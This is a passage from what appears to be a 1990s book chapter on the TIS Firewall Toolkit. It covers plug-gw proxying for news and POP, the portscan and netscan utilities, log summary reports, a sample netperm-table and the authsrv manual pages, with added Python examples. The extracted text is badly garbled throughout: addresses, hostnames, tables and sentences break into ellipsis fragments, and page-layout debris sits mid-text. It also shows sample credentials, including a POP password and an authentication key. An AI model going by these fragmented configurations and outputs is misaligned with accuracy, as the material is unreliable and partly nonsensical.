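        rules.setdefault(app.strip(), []).append((fields[0], fields[1:]))
    return rules


def host_matches(pattern: str, client_ip: Optional[str]) -> bool:
    """client_ip None stands for a caller whose address did not resolve."""
    if pattern == "unknown":
        return client_ip is None
    if client_ip is None:
        return False
    pat, ip = pattern.split("."), client_ip.split(".")
    if len(pat) > 4 or len(ip) != 4:
        return False
    for want, have in zip(pat, ip):
        if want == "*":
            return True           # wildcard covers this and the remaining octets
        if want != have:
            return False
    return len(pat) == 4          # a bare prefix without "*" is not a match


def split_hosts_options(args: List[str]) -> Tuple[List[str], Dict[str, List[str]]]:
    """Host patterns come first; each "-option" collects the tokens after it."""
    hosts: List[str] = []
    opts: Dict[str, List[str]] = {}
    key: Optional[str] = None
    for tok in args:
        if tok in ("{", "}"):
            continue
        if tok.startswith("-"):
            key = tok[1:]
            opts[key] = []
        elif key is None:
            hosts.append(tok)
        else:
            opts[key].append(tok)
    return hosts, opts


def http_gw_decision(rules: Dict[str, List[Rule]], client_ip: Optional[str],
                     function: str) -> Tuple[bool, str]:
    """Apply the first host rule matching the client; no rule means no service."""
    for keyword, args in rules.get("http-gw", []):
        if keyword not in ("hosts", "permit-hosts", "deny-hosts"):
            continue
        hosts, opts = split_hosts_options(args)
        if not any(host_matches(h, client_ip) for h in hosts):
            continue
        if keyword == "deny-hosts":
            return False, "host denied"
        if "permit" in opts:
            allowed = function in opts["permit"]
        elif "deny" in opts:
            allowed = function not in opts["deny"]
        else:
            allowed = True        # no function list: every function is permitted
        return allowed, ("function permitted" if allowed else "function denied")
    return False, "no matching rule"


def plug_gw_target(rules: Dict[str, List[Rule]], local_port: int,
                   client_ip: Optional[str]) -> Optional[Tuple[str, int]]:
    """Match on the port first, then the calling host; return (host, port) or None."""
    for keyword, args in rules.get("plug-gw", []):
        if keyword != "port" or not args or args[0] != str(local_port):
            continue
        hosts, opts = split_hosts_options(args[1:])
        if not any(host_matches(h, client_ip) for h in hosts):
            continue
        if not opts.get("plug-to"):
            continue
        port = int(opts["port"][0]) if opts.get("port") else local_port
        return opts["plug-to"][0], port
    return None
```

The port 2120 rule is the “different port on the firewall” arrangement discussed with the NNTP examples: the client speaks to the firewall on 2120 and plug-gw completes the connection to the second server's port 119.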
This protocol also performs news feeds and is often used to provide news reading services at the workstation level
...

In both cases, the NNTP port is defined in the /etc/services file as 119
...
116
...
* -plug-to 198
...
64
...
53
...
1
...

For the firewall to accept news connections, inetd must be configured to start the plug-gw
application whenever a connection request is made for the NNTP port
...
conf file and restarting inetd:
nntp    stream  tcp     nowait  root    /usr/local/etc/plug-gw  plug-gw 119

If you configure plug-gw but forget this step, the TIS Firewall Toolkit will seem not to
operate—no log messages will print to the files or to the console
...
Normally, this would be the actual NNTP server
that you want to access, but in this case, it is the name or IP address of the firewall
...
If several NNTP servers are available for reading news, you
may want to separate them onto different network ports on the firewall, so that traffic can be
sent to the different sites
...
116
...
* -plug-to 198
...
64
...
116
...
* -plug-to 198
...
64
...
53
...
5 server, they must connect
to the firewall on port 2120
...
3 illustrates the configuration of the WinVN client for
access to news through the firewall
...
3
Configuring WinVN to
use the NNTP proxy
...

What if different news servers are available that your hosts are permitted to connect to? How
does the system administrator configure multiple hosts at the same TCP/IP service port? The
answer is to specify a different port on the firewall, and let plug-gw redirect to the correct port
on the remote system
...
116
...
* -plug-to 198
...
64
...
53
...
5
...
The /etc/services file
should also be edited to add a news NNTP service entry to show the new service port for this
connection
...
This is done by adding the following line to the /etc/inetd
...

nntp-a  stream  tcp     nowait  root    /usr/local/etc/plug-gw  plug-gw 2120

When the user wants to use this alternate server, he or she must reconfigure the news client
software, as shown in figure 7
...


Figure 7
...


Although you can set up your firewall so that NNTP clients can read news, this is generally not
a popular setup
...
This configuration requires the firewall to allow for a news feed to be passed
through to the internal news server
...
The trick is understanding what configuration
information must be placed in the news server configuration files on both ends
...
4
...
nntp provides information regarding what hosts are permitted to connect to the INN
NNTP server
...
5
...
5
News client and server
...
nntp
gatekeeper
...
com

$cat hosts
...
myorg
...
nntp file on each news server contains the name or IP address of the other
news server that is allowed to connect to it
...
nntp files is in fact the name or IP address of the firewall
...
With the hosts
...


plug-gw and POP
When you first think about using POP with the TIS plug-gw application, the obvious
question that comes to mind is “How do I configure things for authentication?” The trick is to
remember which machine is actually performing the authentication
...
It merely accepts the incoming connection on the named port, and
establishes a connection from itself to the named system on the same or different port
...
Consider the
sample output shown here:
$ telnet 206
...
65
...
1
...
53
...
14 starting
...

PASS agdfer
+OK chrish has 0 message(s) (0 octets)
...

$

Notice that the connection to the firewall was established at 206
...
65
...
The remote system
[198
...
64
...

Unfortunately, simply adding the entries to the netperm-table file is not enough. ... This is done by adding the following line to the /etc/inetd.conf file. ... This is done by adding this next line to the netperm-table file:

plug-gw: port 110 206.65.53.14 ...

After it is added, POP service requests received by the firewall are redirected to the specified server. ... 6 shows a configuration screen from the Eudora 1...

...6 Setup for a POP e-mail package ... The IP or name of the firewall can be used interchangeably in this field. ...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

378

Part II: Gaining Access and Securing the Gateway

Consequently, when the incoming connection is received on port 110, plug-gw starts a session to the remote host specified in the plug-gw rule. ...

Incidentally, the POP mail client in use is irrelevant. ...

The Companion Administrative Tools

A set of support tools is included with the TIS Toolkit to assist in the setup and ongoing administration of the firewall. ...


Note: Depending upon the version and completeness of the Toolkit you downloaded, some services and programs may not be installed or compiled automatically. ...

portscan

The portscan program attempts to connect to every TCP port on a given machine. ... The portscan program’s scan of the machine pc...org, for example, was answered by the following ports:

pc# ...unilabs...



netscan

This is a network ping program. ... Its default output is a list of each of the addresses that responded to the ping, along with the host’s name. ...

./netscan 198.32...
198.32...Toronto...net (198.32.53.9)
Harte-Lyne-gw...fonorola...53.10)
198.32...Toronto...net (198.32.53.5...

This indicates that either no device exists, or netscan attempted to contact a device that does not respond to pings. ... In verbose mode, addresses that respond to a ping are placed with their name or address flush left; addresses that did not respond are indented one tab space. ...
./netscan -v 198.32...
trying subnet 198.32...
198.32.53.2
198.32.53.4
198.32...Toronto...net (198.32.53.7)
198.32.53.9
Harte-Lyne-gw...fonorola...53.10)
198.32.53.12
198.32...



Reporting Tools

The TIS Toolkit, configured as a firewall, logs transactions and requests processed by Toolkit applications, and records the outcome of these requests. ... The files used to save the details are listed in /etc/syslog.conf. ... The TIS Toolkit applications all interact with the syslog service and send logging information and status messages for the lifetime of the connection. ... Because the logging is performed using the syslogd service, the log messages observe the standard format:

Date Time hostname program[PID]: message

This format appears in the log file looking like this:

Oct 4 02:42:14 pc ftp-gw[1763]: permit host=stargazer...org/204.3...

Some of these are illustrated in the following output:
cannot connect to server 198.64.53.14/110: Operation timed out
cannot connect to server nis...net/110: Connection refused
cannot connect to server nis...net/110: Operation timed out
cannot get our port
connect host=stargazer...org/206.65.53.14/110
connect host=unknown/206.65.53.14/110
connected host=pc...org/204.3...fonorola...191.150/pc...org connect to fox...ca
deny host=pc...org/204.3...unilabs...191.147 destination=sco...com
deny host=unknown/206.65...unilabs...116.2 destination=198.64...
...116.2 destination=198.64...
...unilabs...191.150 dest= in=0 out=0
exit host=pc...org/204.3...unilabs...191.150 dest=nds...net in=35 out=21 user=unauth duration=37


exit host=pc...org/204.3...unilabs...191.147 cmds=1 in=0 out=0 user=unauth duration=2
exit host=stargazer...org/204.3...gif (80)
fwtksyserr: cannot display denial-msg /usr/local/etc/tn-deny.txt: No such file or directory
fwtksyserr: cannot display help message /usr/local/etc/rlogin-help.txt: No such file or directory
fwtksyserr: cannot display welcome /usr/local/etc/tn-welcome...
...unilabs...116.2 protocol=HTTP cmd=dir dest=www...ca path=/
log host=stargazer...org/206.65...gif path=/
log host=stargazer...org/206.65...nstn...cgi
Network connection closed during write
permit host=pc...org/204.3...191.252
permit host=pc...org/204.3...fonorola...unilabs...191.150 use of gateway
permit host=stargazer...org/204.3...fonorola...unilabs...191.147 destination=204.3...unilabs...191.147 service=ftpd execute=/usr/libexec/ftpd
permit host=stargazer...org/204.3...unilabs...191.147 service=telnetd execute=/usr/libexec/telnetd
permit host=stargazer...org/204.3...unilabs...116.2 use of gateway (Ver p1...
The only way to see a complete list of possible log messages and their exact meanings is to perform a line-by-line review of the TIS Toolkit code, and then document each item individually. ...
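The summary reports described in this section are built from exactly this key=value syslog format. As an added example (not Toolkit code), the following Python parses lines in the documented format into fields and builds the per-host permit/deny counts and byte totals that the denial and ftp-summ style reports print; the log lines are constructed, and their host names and addresses are made up.

```python
"""Summarize TIS Toolkit proxy log lines the way the *-summ.sh reports do:
count permits and denies per client host and program, and add up the in/out
byte counters carried on "exit" records.

Added example; not code from the Toolkit.  The sample lines are constructed
to follow the documented format
    Date Time hostname program[PID]: message
with the key=value tokens shown in the chapter; host names and addresses
are made up."""
import re
from collections import Counter, defaultdict

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
Oct  4 02:42:14 pc ftp-gw[1763]: permit host=stargazer.example.org/206.65.116.3 use of gateway
Oct  4 02:42:20 pc ftp-gw[1763]: exit host=stargazer.example.org/206.65.116.3 dest=ftp.example.net in=35 out=21 user=unauth duration=37
Oct  4 02:45:01 pc tn-gw[1790]: deny host=unknown/206.65.116.9 destination=198.51.100.7
Oct  4 02:45:09 pc tn-gw[1791]: deny host=unknown/206.65.116.9 destination=198.51.100.7
Oct  4 03:01:33 pc netacl-telnetd[1802]: permit host=pc.example.org/206.65.116.2 service=telnetd execute=/usr/libexec/telnetd
Oct  4 03:02:10 pc plug-gw[1810]: cannot connect to server 198.51.100.14/110: Operation timed out
Oct  4 03:05:44 pc http-gw[1822]: exit host=pc.example.org/206.65.116.2 dest=www.example.net in=1024 out=315000 user=unauth duration=12
"""

# syslog prefix: month day time hostname program[pid]: message
SYSLOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) "
    r"(?P<host>\S+) (?P<prog>[\w.-]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$")
KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line):
    """Return a dict with prog, verb (first word of the message) and any
    key=value fields, or None if the line is not in Toolkit format."""
    m = SYSLOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    msg = rec["msg"]
    rec["verb"] = msg.split(" ", 1)[0]
    rec["fields"] = dict(KV_RE.findall(msg))
    return rec


def summarize(text):
    """Build the counters the denial / ftp-summ style reports print:
    permits and denies per (client, program), bytes per client, proxy errors."""
    permits, denies, errors = Counter(), Counter(), Counter()
    traffic = defaultdict(lambda: {"in": 0, "out": 0})
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        client = rec["fields"].get("host", "-")   # name/address as logged
        key = (client, rec["prog"])
        if rec["verb"] == "permit":
            permits[key] += 1
        elif rec["verb"] == "deny":
            denies[key] += 1
        elif rec["verb"] == "exit":
            # exit records carry the byte counters for the whole session
            traffic[client]["in"] += int(rec["fields"].get("in", 0))
            traffic[client]["out"] += int(rec["fields"].get("out", 0))
        elif rec["verb"] == "cannot":
            # "cannot connect to server X/port: reason" from plug-gw and friends
            errors[rec["prog"]] += 1
    return {"permits": permits, "denies": denies,
            "traffic": dict(traffic), "errors": errors}


def report(summary):
    """Render the summary in the same shape as the Toolkit's text reports."""
    lines = ["Top denied network service users (total: %d)"
             % sum(summary["denies"].values())]
    for (client, prog), n in summary["denies"].most_common():
        lines.append("%5d  %s:%s" % (n, client, prog))
    lines.append("Proxy traffic per client (bytes)")
    for client, t in sorted(summary["traffic"].items()):
        lines.append("%8d in %8d out  %s" % (t["in"], t["out"], client))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(summarize(SAMPLE_LOG)))
```

Clients logged as host=unknown/... are connections for which no reverse DNS name was available, which is what a deny-hosts unknown rule is meant to catch.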
These shell scripts, listed in table 7...



Table 7...

...sh              Summarizes auth server reports
daily-report.sh    ...
...                Reports on denial of services
ftp-summ.sh        ...
...                Summarizes the http-gw traffic
netacl-summ.sh     ...
...                Summarizes smap email records
tn-gw-summ.sh      ...
...                Top-level driver that calls each summary report generator

The reporting tools included in the TIS Toolkit are not installed automatically when the Toolkit applications are compiled and installed. ... admin... This copies all the files to the same directory in which the Toolkit applications were copied. ... A typical report of authsrv-summ...

./authsrv-summ.sh ... 0
Top 100 permitted user authentications (total: 6)
Logins  User ID
------  -------
4       admin
2       chrish
Top 100 failed user authentications (total: 2)
Attempts  Username
--------  --------
1         paulp
1         chrish


Authentication Management Operations
------------------------------------
administrator ADDED admin
administrator ADDED admin
administrator ADDED chrish
administrator ADDED chrish
administrator ADDED paulp
administrator DELETED admin
administrator DELETED chrish
administrator ENABLED admin
administrator ENABLED chrish
administrator GROUP admin manager
administrator GROUP chrish production
administrator GROUP paulp copy
administrator GWIZ chrish
administrator GWIZ chrish
administrator GWIZ paulp
administrator PASSWORD admin
administrator PASSWORD chrish
administrator PROTOCOL admin
administrator PROTOCOL chrish
administrator UN-GWIZ chrish
administrator WIZ admin
administrator WIZ chrish

Notice that this and all the other reporting tools expect to read their data from the standard input stream. ...

The authsrv summary report lists the total authentication requests made and by whom, the denied authentications, and the authentication database management operations. ...


The Service Denial Report

The purpose of the service denial report is to identify hosts that attempted to connect through the firewall and were not permitted. ... sh looks like this:

pc# ...sh < /var/log/messages
...unilabs...116.3 - chrish
Top 100 network service users (total: 152)
Connects  Host/Address
--------  ------------
120       stargazer...org/206.65...unilabs...116.3:ftp
5         stargazer...org/206.65...unilabs...116.2:telnetd
3         stargazer...org/206.65...unilabs...116.3:telnet
2         stargazer...org/206.65...unilabs...116.3:
1         unknown/206.65...unilabs...116.3:telnetd
1         pc...org/206.65...unilabs...116.2:telnet
2         pc...org/206.65...116.2:110
1         stargazer...org/206.65...unilabs...116.2:110
1         stargazer...org/206.65...unilabs...116.3:2120
1         pc...org/206.65...unilabs...116.3:110
1         pc...org/206.65...

All of these examples may be legitimate problems, or potential security breaches. ...
It identifies the number of connections, the origin of the connection, and the amount of data transferred. ... sh looks like this:

pc# cat /var/log/messages* | ...sh
FTP service users (total: 23)
Connects  Host/Address
--------  ------------
13        stargazer...org/204.3...unilabs...116.3
3         pc...org/204.3...unilabs...116.2
Denied FTP service users (total: 4)
Connects  Host/Address
--------  ------------
2         pc...org/206.65...fonorola...191.252
FTP service output thruput (total Kbytes: 6)
KBytes    Host/Address
------    ------------
6         pc...org/206.65...unilabs...116.3
0         stargazer...org/206.65...unilabs...191.147
pc#

As you can see in this report, several service denials occurred on this firewall. ... Many sites choose to not allow FTP at all because of the potential problems associated with pirated software or virus-infected software. ...

The report covers connection requests, denied service requests, and input and output through the proxy. ...

./http-summ...
...unilabs...116.2
2         pc...org/206.65...116.2
Denied HTTP service users (total: 1)
Connects  Host/Address
--------  ------------
1         stargazer...org/206.65...unilabs...116.2
HTTP service input thruput (total Kbytes: 315)
KBytes    Host/Address
------    ------------
315       stargazer...org/206.65...

You can see this in list 4; 1 KB of data out through the firewall resulted in 315 KB from the remote end. ...
This program enables administrators and other users to operate directly on the firewall without the need to be on the console. ... A sample execution of the netacl-summ...

./netacl-summ...
...unilabs...191.147
13        stargazer...org/206.65...116.2


2
2         unknown/204.3...unilabs...116.3

Top 100 Denied network service users (total: 11)
Connects  Host/Address
--------  ------------
6         pc...org/204.3...unilabs...191.147
1         stargazer...org/206.65...fonorola...191.252
1         mail...net/198.64...

This setup was chosen so that you, the network administrator, could update files and interact with the firewall from places other than the console. ...

This report identifies sites that are attempting to log in or ftp directly to the firewall itself, rather than log in to a site behind the firewall. ... Many sites do not allow any traffic other than mail through the firewall; for this reason, knowledge of the amount of information available helps determine if the chosen hardware platform is in fact doing the job. ...

The following sample execution of the mail report, smap-summ...

./smap-summ...
...6    skhan@compmore...
6       chrish
2  2    ...3713@compuserve...
5       chrish@fonorola...
1       chrish@unilabs...
9       denny@nstn...
9       chrish@nds...net

Top 100 mail senders (in messages)
Messages
Count  Kb   Address
-----  --   -------
9      21   ...org
1      1    ...compmore...
...6        skhan@compmore...
6           chrish
2      2    ...3713@compuserve...
5           chrish@fonorola...
1           chrish@unilabs...
9           denny@nstn...
9           chrish@nds...net
Top 100 mail senders (in kilobytes)
Messages
Count  Kb   Address
-----  --   -------
9      21   ...org
1      1    ...compmore...

...sh) combines activity through the firewall of the telnet and rlogin services. ... sh:


Top 100 telnet gateway clients (total: 43)
Connects  Host/Address
--------  ------------
17        stargazer...or...
16        pc...org/204...unilabs...
          ...unilabs...191.14
1         unknown/206.65...unilabs...
1         ...
Input:   924   97325   274   26771   27271   10493   0
Output:  177   1243    6     717     710     701     0
Total:   1101  98568   280   27488   27981   11194   0

Top 100 telnet gateway clients in terms of traffic
Connects  Host/Address                        Input   Output
--------  ------------                        -----   ------
16        pc...org/204...unilabs...191.14     27271   710
1         unknown/206.65...unilabs...unilabs...unilabs...
1         ...                                 0       0
Total:   98568   27488   27981   11194   1101   280   0

Top 100 Denied telnet gateway clients (total: 20)
Connects  Host/Address
--------  ------------
14        stargazer...or...
2         stargazer...or...
2         204.3...uni...
1         unknown/204.3...fonorola...

You can see, for example, that stargazer...org is in both the connections and denied lists. ...


Where to Go for Help

Help with the TIS Toolkit is easy to find. ...
...2600
alt.security


You can also find help by joining the mailing list concerned with a general discussion of firewalls and security technology:

firewalls@greatcircle.com

with the text

subscribe firewalls

in the body of the message. ... com

In addition, the TIS Toolkit includes a large amount of documentation on firewalls. ... Before you commit to an operating system and hardware platform, ask questions on this mailing list; probably many of the list’s readers have had similar questions and experiences. ... To help you understand this file better, a prodigious number of comments is included. ...

#
# Sample netperm configuration table
# Change YOURNET to be your network IP address
# Change YOURADDRESS to be the IP address of a specific host
#
# Example netacl rules:
# --------------------
# if the next 2 lines are uncommented, people can get a login prompt
# on the firewall machine through the telnet proxy


# This is okay, but means that anyone who is authorized to connect to the
# firewall box through the proxy can get a login prompt on the firewall
# ...

#netacl-telnetd: permit-hosts 127.0...

netacl-telnetd: permit-hosts 206.65.116.3 -exec /usr/libexec/telnetd
#
# if the next line is uncommented, the telnet proxy is available
#netacl-telnetd: permit-hosts * -exec /usr/local/etc/tn-gw
#
# if the next 2 lines are uncommented, people can get a login prompt
# on the firewall machine through the rlogin proxy
#netacl-rlogind: permit-hosts 127.0...
...6.2 -exec /usr/libexec/rlogind -a
#
# if the next line is uncommented, the rlogin proxy is available to any host
#netacl-rlogind: permit-hosts * -exec /usr/local/etc/rlogin-gw
#
# The next line allows FTP sessions from the specified network(s) to the
# firewall system itself
...116.* -exec /usr/libexec/ftpd -A -l
#
# Uncommenting the next line will turn off FTP and print a message to that
# effect whenever someone attempts to access the FTP port
...116...147 -exec /bin/cat /usr/local/etc/noftp
...* -exec /usr/libexec/fingerd
#netacl-fingerd: permit-hosts * -exec /bin/cat /usr/local/etc/finger...

smap: userid 6
smap: directory /var/spool/smap
smap: timeout 3600
#
# Change this to increase/decrease the maximum message size that will be
# permitted
...

ftp-gw: denial-msg /usr/local/etc/ftp-deny.txt
ftp-gw: help-msg /usr/local/etc/ftp-help...
...116...*
#
# the following line logs all get and put requests, and authorizes put
# requests
...116...* -log { retr stor } -auth { stor }
# uncomment the following line if you want external users to be
# able to do FTP with the internal network using authentication
#ftp-gw: permit-hosts * -authall -log { retr stor }
#
# Example telnet gateway rules:
# ----------------------------
tn-gw: denial-msg /usr/local/etc/tn-deny.txt
tn-gw: help-msg /usr/local/etc/tn-help...
...fonorola... All other requests are denied ...
...116...* -dest *
...net -dest !* -passok -xok


tn-gw: permit-hosts 206.65.116.150
# if this line is uncommented incoming traffic is permitted WITH
# authentication required
# tn-gw: permit-hosts * -auth
# Example rlogin gateway rules:
# ----------------------------
#rlogin-gw: permit-hosts YOURNET...
...txt
rlogin-gw: welcome-msg /usr/local/etc/rlogin-welcome.txt
#rlogin-gw: help-msg /usr/local/etc/rlogin-help...
...116...* -dest *
...net -dest !* -passok -xok
rlogin-gw: deny-hosts * -dest 206.65.0.1
authsrv: database /usr/local/etc/fw-authdb
authsrv: badsleep 1200
authsrv: nobogus true
authsrv: permit-hosts localhost
# clients using the auth server
*: authserver 127.0...

#
# Uncomment the next line to allow NNTP connections to be routed to an
# external news server for news reading
...* -plug-to NEWS_SERVER_IP
#
# Uncomment the next line to allow POP mail connections from the private
# network to an external POP mail host
...* -plug-to POP_MAIL_HOST_IP
#
# HTTP-GW
# -------
# This section provides some examples for the http-gw proxy
#
http-gw: userid www
# http-gw: directory /usr/local/secure/www
http-gw: timeout 1800
http-gw: default-httpd www...net
http-gw: default-gopher gopher...net
http-gw: permit-hosts 206.65.116.2
http-gw: deny-hosts unknown

Manual Reference Pages

The following manual pages are taken from the TIS Toolkit and modified to fit within the formatting of this book. ... The sections not generally included are BUGS, SEE ALSO, and FILES. ... Each manual page includes the following sections:

- Synopsis
- Description
- Options
- Installation

Command-specific sections are also included. ...

Authmgr—Network Authentication Client Program

Synopsis

authmgr


Description

authmgr is a client-side interface to the authentication daemon authsrv. ... The authmgr program passes most of its commands directly over a network to authsrv. ...

Options

authmgr takes no command-line options, reading its configuration information from the firewall Toolkit configuration file netperm-table. ... If the optional port is specified, it is used as a numeric service port value. ... Keys must match between client and server. ...

Installation

To install authmgr, configure the authserver option in netperm-table to contain the address of the authentication server system. ...

authsrv—Network Authentication Third-Party Daemon

Synopsis

authsrv via inetd


Description

authsrv functions as a simple third-party authentication server, and provides an integrated interface for multiple forms of authentication, such as passwords, one-time passwords, and token authentication systems. ... authsrv maintains extensive logs of transactions, authentication failures and successes, and all changes to its database. ...

Many commercial products for authentication include their own programming interface; for this reason, the simultaneous support of multiple forms of authentication within a single piece of software is cumbersome. ... Currently authsrv contains support for Digital Pathways Secure Net Key, Security Dynamics SecurID, Bellcore S/Key, and plaintext passwords. ... When a client connects to the authentication server, it issues a request to authenticate a user:

authorize userID
authenticate userID

To which the server will respond with one of two options:

password
challenge challengestring

The client program should prompt the user for a (non-echoing) password if it receives the “password” response, or it should prompt the user with the returned challenge string if it receives the “challenge” response. ... The client program forwards the response in the form of:

response responsestring

In some cases, the server may respond with “OK” followed by additional text on the same line. ... Change your password soon”). ... If it is invoked from a terminal with the current user-id being 0 (“root”) it will automatically grant administrative privileges to the session. ...

Generally, authsrv is designed to run on a secured system that is relatively restricted to users. ... To ease administration, authsrv can be managed remotely using a client program with optional DES-encrypted communications between the client and server. ... Each user may be assigned to a group, consisting of a short arbitrary string name. ... A group administrator can create, enable, disable, and delete users from that group, but may not create additional group administrators or groups. ... This setup provides a flexible management environment—a variety of management schemes can be implemented. ... To implement a hierarchical management scheme, create several group administrators and let each manage a group separately. ... All operations can be performed at a group level, and new groups can be created by running authsrv in administrator mode on the system where the database resides. ... All configuration rules in netperm-table for application “authsrv” are read, and the following clauses and parameters are recognized:

database pathname

This command specifies the pathname of the authsrv database. ... If the software is built with a compiled-in database name, this option need not be set, otherwise it is mandatory. ...

If nobogus is set, attempts to log in will return more explicit error messages. ...


The following command establishes a “sleep time” for repeated bad logins:

badsleep seconds

If a user attempts to authenticate five times and fails, their user record is marked as suspicious, and they cannot log in again. ... If the badsleep value is 0, users may attempt (and fail) to log in as many times as they would like. ...
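Both the authorize/password/challenge/response exchange described in the Description section and the badsleep lockout rule above are modelled in the following Python, added here as an example rather than taken from the Toolkit. The salted hashing of stored passwords, the HMAC stand-in for a token device's challenge computation, and the assumption that a record locked after five failures is usable again once badsleep seconds have elapsed are mine.

```python
"""Model of the authsrv client/server exchange from the manual page:
    client: authorize <user>
    server: password              (or)  challenge <string>
    client: response <text>
    server: ok                    (or)  Permission denied
plus the badsleep rule: five failures mark the record suspicious ("b")
and refuse logins for badsleep seconds; badsleep 0 means unlimited tries.

Added example, not the Toolkit's code.  The password hashing, the HMAC
used to answer a challenge (a stand-in for the real SNK/S/Key maths) and
the re-enable-after-badsleep timing are assumptions of this example."""
import hashlib
import hmac
import os
import time

MAX_FAILURES = 5          # the manual page's "five times and fails"


class AuthSrv:
    def __init__(self, badsleep=1200, clock=time.time):
        self.badsleep = badsleep
        self.clock = clock        # injectable so tests can move time forward
        self.users = {}           # name -> record
        self.pending = {}         # name -> outstanding challenge string
        self.current = None       # user named by the last authorize

    # --- administrative side: adduser / proto / pass rolled into one call ---
    def adduser(self, name, proto="password", secret=""):
        salt = os.urandom(8)
        self.users[name] = {
            "proto": proto, "salt": salt, "enabled": True,
            "failures": 0, "locked_until": 0.0,
            # plaintext protocol keeps a salted hash; challenge protocol keeps
            # the device's shared key (constructed stand-in for SNK/S/Key)
            "secret": self._hash(salt, secret) if proto == "password"
                      else secret.encode(),
        }

    @staticmethod
    def _hash(salt, text):
        return hashlib.sha256(salt + text.encode()).digest()

    # --- the wire protocol: one request line in, one reply line out ---
    def handle(self, line):
        verb, _, arg = line.strip().partition(" ")
        if verb in ("authorize", "authenticate"):
            return self._authorize(arg)
        if verb == "response":
            return self._response(arg)
        if verb == "quit":
            return "ok bye"
        return "error unknown command"

    def _authorize(self, name):
        self.current = name
        rec = self.users.get(name)
        if rec is None or not rec["enabled"]:
            # do not reveal whether the user exists (nobogus unset behaviour)
            return "password"
        if rec["locked_until"] > self.clock():
            return "Permission denied (too many bad logins)"
        if rec["proto"] == "password":
            return "password"
        chal = os.urandom(4).hex()
        self.pending[name] = chal
        return "challenge " + chal

    def _response(self, text):
        rec = self.users.get(self.current)
        if rec is None or not rec["enabled"]:
            return "Permission denied"
        if rec["proto"] == "password":
            good = hmac.compare_digest(self._hash(rec["salt"], text), rec["secret"])
        else:
            chal = self.pending.pop(self.current, "")
            good = hmac.compare_digest(expected_response(rec["secret"], chal), text)
        if good:
            rec["failures"] = 0
            return "ok"
        rec["failures"] += 1
        if rec["failures"] >= MAX_FAILURES and self.badsleep > 0:
            rec["failures"] = 0
            rec["locked_until"] = self.clock() + self.badsleep   # status "b"
        return "Permission denied"


def expected_response(key, challenge):
    """Stand-in token calculation: what the user's device would display."""
    return hmac.new(key, challenge.encode(), hashlib.sha256).hexdigest()[:16]


def client_login(srv, user, answer):
    """Drive the exchange from the client side.  answer(kind, challenge)
    supplies the password or the reply to a challenge; the server's final
    verdict line is returned."""
    reply = srv.handle("authorize " + user)
    if reply.startswith("Permission denied"):
        return reply
    kind, _, chal = reply.partition(" ")
    return srv.handle("response " + answer(kind, chal))
```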

To specify the userid that authsrv should run under, use a name from the password database, or a numeric userid in the command:

userid name

To specify that authsrv should permit the named host or addresses to use the service, add this command:

hosts host-pattern [key]

Hosts that do not have a matching entry are denied use of the service. ...

Commands

The following command implements the first part of the authentication sequence:

authorize username

If the authorize command is issued after a user has already authenticated to the authentication server, their current authentication is cleared. ...

This is returned in response to a password or challenge query from the authentication server:

response

To disconnect from the authentication server, issue:

quit

or exit

To display the status, authentication protocol, and last login of the specified user, issue the command:

display username

Before the authentication server permits the use of this command, the user must first be authenticated to the server as the administrator, or the group administrator of the group to which the user belongs. ... If the user is a group administrator, the newly created user is automatically initialized as a member of that group. ... If a long name is provided, it will be stored in the database. ... Ranum”

To delete the specified user from the authentication database, use the command:

deluser username

Before this command can be used, the user must first be authenticated to the server as the administrator or group administrator of the group to which the user being deleted belongs. ...

To set the password for the current user, issue:

password [username] text

If an optional username is given and the authenticated user is the administrator or group administrator, the password for the specified user is changed. ... For example, if the user’s authentication protocol is plaintext passwords, the command will update the plaintext password. ...

The following command sets the authentication protocol for the specified user to the named protocol:

proto user protoname

Available protocols depend on the compiled-in support within authsrv. ... To set the specified user’s group, use the command:

group user groupname


To use this command, a user must first be authenticated to the server as the administrator. ...

The following commands set and unset the group administrator flag on the specified user. ...

wiz user
unwiz user

This command sets the specified user as a global administrator:

superwiz user

Warning: The superwiz command should be used with caution. ... For this reason, global administrative privileges are seldom used. ... The list displays several fields, including:

- user ...
- group ... If none is listed, the user is in no group. ...
- longname ... The user’s full name. ...
- status ... If this field is marked “y” the user is enabled and may log in. ... If marked “b” the user’s login is temporarily disabled because of too many bad login attempts. ...
- proto ...
- last ...

To list a short synopsis of available commands, use this command:

?

or help

To determine if the named user is allowed to perform the specified service, use the command:

operation user username service dest [other tokens] [time low# high#]


The service might be any one of the application gateways such as telnet-gw, ftp-gw, or rlogin-gw. ... The optional tokens are matched as wildcards to permit a proxy to specify more detailed operations. ... If no match is found, a message indicating that no match was found is returned to the client program. ... tis... tis... For each user/group the name is specified followed by the service destination [optional tokens] [time start end]. ... The name is either the username or the group name. ... The optional tokens are checked for a match, permitting a proxy to send a specific operation check to the authentication server. ... The start_time and end_time parameters can be in the range 00:00 to 23:59. ... tis... tis... tis... com
deny-operation group admin ftp-gw * ...

To initialize the database, use the command su to go to the root directory, run authsrv at the command line, then issue the following commands:

#
# authsrv
-administrator mode-
authsrv# list
Report for users in database
user     group     longname     ok? proto    last
----     -----     --------     --- -----    ----
authsrv# adduser admin ‘Auth DBA’
ok - user added initially disabled
authsrv# ena admin
enabled
authsrv# proto admin Snk
changed
authsrv# pass ‘160 270 203 065 022 034 232 162’ admin
Secret key changed
authsrv# list


Report for users in database
user     group     longname     ok? proto    last
----     -----     --------     --- -----    ----
admin              Auth DBA     ena Snk      never
authsrv# quit
#

In this example, the administrator account is established, then enabled, a protocol is assigned, and the initial password is set. ... In this example, the administrator record is using a SecureNet Key, so the password record consists of the shared secret key used by the device. ... conf, then restart inetd. ...

Note: Ensure that the database is protected against casual perusal by checking its file permissions. ... When ftp-gw is invoked from inetd, it reads its configuration and checks to see if the system that has just connected is permitted to use the proxy. ... If the peer is permitted to use the proxy, ftp-gw enters a command loop in which it parses all FTP requests and passes them to a remote FTP server. ...

Two methods are supported to permit users to specify the system they want to FTP to through the proxy. ...

220 gatekeeper FTP proxy (Version 1...

Name (host:user): user@somplace
